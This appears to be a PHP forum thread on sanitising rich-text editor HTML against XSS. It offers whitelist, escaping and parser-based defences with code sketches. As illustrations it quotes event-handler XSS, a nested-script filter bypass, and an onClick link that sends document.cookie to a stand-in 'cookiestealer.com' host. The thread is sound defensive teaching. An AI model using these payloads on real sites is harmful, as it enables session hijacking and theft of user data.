Rich text editing
If I have an extremely simple editing system (think blog, with little structure), and I add a rich text editor (such as FCKeditor), what general steps do I need to take to ensure security?
I'm presuming something like:
- Rich text editor for input
- Filter input (To remove what? How?)
- Add escaping for storage to DB
- Store to DB
- Pull from DB
- Escape output (To remove what? How?)
- Present output to user
The two items with questions in parentheses (bolded in the original post) are the ones I am unclear on the specifics for, and I would appreciate guidance. If we are allowing users to enter *rich text*, which includes HTML, I'm very unclear on the full range of items we need to filter to ensure no XSS, JS attacks, and so forth.
I'm also unclear on the specifics of what you would escape in the output. By definition, we want html to come through, so what would we be htmlentities escaping?
Any specific guidance on these general concepts is appreciated. While I'm strong on security in other areas, these two items in this specific scenario are something I've always avoided as being too risky, but I can no longer do so.
Any pre-packaged solutions for any of the above steps are also welcome. By way of example, I'll be using adodb for the escaping for storage, and for CRUD events. The solutions would need to be GPL-compatible.
Please be gentle. I know that I am normally one of the first people answering these types of questions, but this is an area where I am less confident, and I would appreciate the knowledge and understanding of the community to help me improve.
I can't give you an all-encompassing security solution, but I can start you off with this:
By default, RTEs will automatically already be "htmlentitied".
In other words, if I type in <script> in my RTE, it's going to interpret the "<" as &lt; etc.
The way I've done it in the past is to use the innerHTML of the element (usually an iframe) and copy that info to a hidden form var, then on post take the value of that form var and dump it into my DB.
You'll still want to run it through mysql_real_escape_string(), but other than that, I haven't run into any issues.
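For the storage step, note that mysql_real_escape_string() belongs to the old mysql extension, which was removed in PHP 7. Bound parameters do the same job without manual escaping. The following is only a minimal sketch: it assumes PDO with the SQLite driver (chosen so the example is self-contained), and the table and column names are invented for illustration. It protects the database only; it does nothing about XSS in the stored HTML.

```php
<?php
// Assumption: PDO with the SQLite driver, used only to keep the sketch
// self-contained. The "posts" table and "body" column are hypothetical.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, body TEXT)');

// Rich text as it might arrive from the hidden form field.
$body = "<p>It's a \"quoted\" post</p>";

// The value travels separately from the SQL text, so quotes in it
// cannot change the meaning of the statement.
$insert = $pdo->prepare('INSERT INTO posts (body) VALUES (:body)');
$insert->execute([':body' => $body]);

// Read it back: the stored value is byte-for-byte what was submitted.
$stored = $pdo->query('SELECT body FROM posts WHERE id = 1')->fetchColumn();
var_dump($stored === $body);
```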
The dangers in the input & output are possible execution of code, and broken xhtml code.
FCKeditor (and most other RTEs) let you edit the source code directly. It's easy, then, to post broken code which breaks the web page displaying it. Perhaps writing a parser, or somehow using a command-line version of HTML Tidy, could at least tell you if the XHTML is malformed.
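One way to get a "malformed or not" answer without shelling out to Tidy is to let PHP's bundled libxml try to parse the fragment as XML. This is a rough sketch, assuming the SimpleXML extension is enabled and the fragment is meant to be XHTML; the function name and the wrapper element are made up for illustration. It checks well-formedness only, not validity against the XHTML DTD, and named entities such as &nbsp; will be reported as errors because no DTD is loaded. It is not a security filter.

```php
<?php
// Hypothetical helper: reports whether an XHTML fragment is well-formed XML.
function isWellFormedFragment(string $fragment): bool
{
    // Collect parse errors internally instead of emitting PHP warnings.
    $previous = libxml_use_internal_errors(true);

    // Wrap in a single root element so multi-element fragments can parse.
    $xml = simplexml_load_string('<div>' . $fragment . '</div>');

    // Restore the previous error-handling state.
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    return $xml !== false;
}

var_dump(isWellFormedFragment('<p>Hello <b>world</b></p>')); // bool(true)
var_dump(isWellFormedFragment('<p>Hello <b>world</p>'));     // bool(false)
```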
As for stopping PHP code from being executed - that's easy. Just don't ever handle that string in such a way as to be executed.
Javascript may be a little more difficult. Inline javascript will, of course, have to be put inside <script></script> tags - so you could just parse the input and strip out those tags and anything they contain.
- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
Mmm... as the market stands now, no pure-PHP solution is satisfactory, mainly because they don't really "know" about the HTML specification. I've been working on something that does, and let me tell you, it's not easy.
The "best" way to do it would be to...
1. Lex the HTML fragment according to the SGML standard into tokens (MarkupLexer, finished that)
2. Take tokens and pass them through a DTD, which knows about the specification and can check for many things:
* Proper nesting (not just "do all elements close" but "did they try to put a block level element in an inline one"?)
* Proper attribute formats (at least a dozen RFCs for each including URLs and CSS)
3. Recompile the tokens into HTML
4. Run a gauntlet of compatibility checks, attempting to eliminate any possible browser quirks that cause non-standard behavior and could compromise insecure browsers (esp. IE, this happens A LOT)
5. If changes were made, re-rinse, until the HTML stops changing
Of course, no one in their right mind would do it (except me). But any other solution is unsatisfactory. This is the main reason why forums use BBcode, and why most systems that actually have HTML parsing don't do it completely correctly, and are hideously complex.
(I believe I've harped about this in a previous thread already, but I can't remember what it was)
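Step 5 (re-rinse until the HTML stops changing) can be illustrated on its own. The sketch below is not the MarkupLexer approach described above; it uses a deliberately naive, hypothetical pass that just deletes script tags, purely to show why a single pass can leave dangerous output behind and how a fixed-point loop catches it. Both function names are invented for this example.

```php
<?php
// Hypothetical single pass: naively deletes "<script>" and "</script>".
// It stands in for a real filter only to show why one pass is not enough.
function naivePass(string $html): string
{
    return str_ireplace(['<script>', '</script>'], '', $html);
}

// Re-run a pass until its output stops changing (or a round limit is hit).
function filterUntilStable(string $html, callable $pass, int $maxRounds = 10): string
{
    for ($round = 0; $round < $maxRounds; $round++) {
        $next = $pass($html);
        if ($next === $html) {
            return $html; // fixed point reached
        }
        $html = $next;
    }
    throw new RuntimeException('Filter did not stabilise');
}

// Deleting the inner tags reassembles the outer ones.
$input = '<scr<script>ipt>alert(1)</scr</script>ipt>';

echo naivePass($input), "\n";                      // <script>alert(1)</script>
echo filterUntilStable($input, 'naivePass'), "\n"; // alert(1)
```

The loop only guarantees that the chosen pass has nothing left to change; it does not make a weak pass strong.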
Burrito wrote: if I type in <script> in my RTE, it's going to interpret the "<" as &lt; etc.
And if I telnet in and type <script> in my POST data, it's not going to escape anything.
pickle wrote: Inline javascript will, of course, have to be put inside <script></script> tags
What about
Code:
<p onMouseOver="armagedon(); return false;"></p>
I would personally say use a "fuzzy" whitelist, using preg.
If the rich text allows bold, italics, underline, and colors, for example, you can match against each one in turn:
Code:
// $input is the submitted fragment
preg_match('@<span style="color:#?([a-zA-Z0-9]+)?;" >([a-zA-Z0-9]+)</span>@', $input);
jshpro2 wrote: What about
Code:
<p onMouseOver="armagedon(); return false;"></p>
Or things along those lines?
armagedon() will still have to be declared within <script></script> tags. The worst that'll do (unless Roja defines a function armagedon()) is generate a script error... I think.
That's an example. Instead of calling that function, you can put JavaScript right in there. Here's a different example, though:
Code:
<a href="#" onClick="window.location.href='http://cookiestealer.com/script.php?ssid='+document.cookie">free beer click here</a>
No <script> tags needed.
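Attacks like the two above are why a filter has to look at attributes and not just tag names. Here is a rough whitelist sketch using PHP's DOM extension: anything not explicitly allowed is dropped, including every on* handler and any href that does not start with a known-safe prefix. The whitelist contents and the function names are assumptions made for this example, the input is assumed to be ASCII, and elements that are not allowed are removed together with their content. It does not check nesting or know the HTML specification, so treat it as an illustration of the whitelist idea rather than a complete filter.

```php
<?php
// Assumed whitelist for illustration: tag name => allowed attributes.
const ALLOWED = [
    'p' => [], 'b' => [], 'i' => [], 'u' => [], 'em' => [], 'strong' => [],
    'a' => ['href'],
];

// Accept only URLs that start with an explicitly allowed prefix.
function isSafeUrl(string $url): bool
{
    return preg_match('~^(?:https?://|mailto:|/|#)~i', $url) === 1;
}

function cleanChildren(DOMNode $node): void
{
    // Snapshot first: the live child list changes as nodes are removed.
    $children = [];
    foreach ($node->childNodes as $child) {
        $children[] = $child;
    }
    foreach ($children as $child) {
        if ($child instanceof DOMText) {
            continue; // plain text is kept; saveHTML() escapes it on output
        }
        $tag = strtolower($child->nodeName);
        if (!($child instanceof DOMElement) || !array_key_exists($tag, ALLOWED)) {
            $node->removeChild($child); // unknown element, comment, etc.
            continue;
        }
        // Collect names first, then remove, so iteration is not disturbed.
        $names = [];
        foreach ($child->attributes as $attr) {
            $names[] = $attr->nodeName;
        }
        foreach ($names as $name) {
            $keep = in_array(strtolower($name), ALLOWED[$tag], true);
            if ($keep && strtolower($name) === 'href') {
                $keep = isSafeUrl($child->getAttribute($name));
            }
            if (!$keep) {
                $child->removeAttribute($name);
            }
        }
        cleanChildren($child);
    }
}

function sanitizeFragment(string $html): string
{
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true); // silence parser warnings
    $doc->loadHTML('<div>' . $html . '</div>');   // wrapper gives a known root
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $root = $doc->getElementsByTagName('div')->item(0);
    cleanChildren($root);

    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

echo sanitizeFragment('<a href="#" onClick="steal()">free beer click here</a>'), "\n";
echo sanitizeFragment('<p onMouseOver="armagedon(); return false;">hi</p>'), "\n";
```

In both cases the handler attribute is gone while the text (and the harmless href) remain.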
How much HTML do you want to allow? For simple things, I find it easiest to escape everything and then convert allowed entities back to their original form. This also lets you make sure the user has closed bold tags and things of that nature.
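The "escape everything, then convert allowed tags back" idea might look something like this. It is a minimal sketch: the list of allowed tags and the function name are assumptions for illustration, only attribute-free tags are restored, and it does not check that tags are closed or properly nested.

```php
<?php
// Hypothetical helper; the allowed tags (b, i, u, em, strong) are an assumption.
function escapeThenRestore(string $input): string
{
    // Step 1: neutralise all markup, quotes included.
    $escaped = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

    // Step 2: turn back only exact, attribute-free forms of the allowed tags.
    return preg_replace('#&lt;(/?)(b|i|u|em|strong)&gt;#i', '<$1$2>', $escaped);
}

echo escapeThenRestore('<b>bold</b> <script>alert(1)</script>'), "\n";
// <b>bold</b> &lt;script&gt;alert(1)&lt;/script&gt;
```

Because a tag carrying any attribute never matches the pattern, something like <b onclick="..."> stays escaped and is shown as text.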
For more complex needs, you might find this helpful:
http://cyberai.com/inputfilter/
It lets you take a whitelist or blacklist approach with both tags and attributes, and it also has an option to automatically remove common problems.
Note that inputfilter isn't perfect, and if you make it too permissive, it will let malicious output through (only because it doesn't actually know about the specification). At the very least, its output can cause your document to stop validating (e.g. it doesn't check proper nesting of blocks and inlines).